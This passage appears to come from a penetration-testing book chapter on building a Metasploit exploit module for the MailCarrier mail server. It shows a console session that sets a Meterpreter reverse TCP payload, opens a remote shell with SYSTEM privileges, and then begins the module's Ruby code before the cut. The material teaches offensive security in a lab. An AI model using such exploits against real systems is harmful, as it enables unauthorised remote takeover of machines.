Figure 15-3: Randomized MailCarrier buffer
The payload.encoded function tells Metasploit to append the indicated payload to the end of the malicious string at run time.

Now, when we load our module, set a real payload, and execute it, we should be presented with our hard-earned shell, as shown here:

msf exploit(mailcarrier_book) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mailcarrier_book) > exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.155:1265)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Our Completed Module
Just to wrap things up, here is the complete and final code for this Metasploit exploit module:

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::Tcp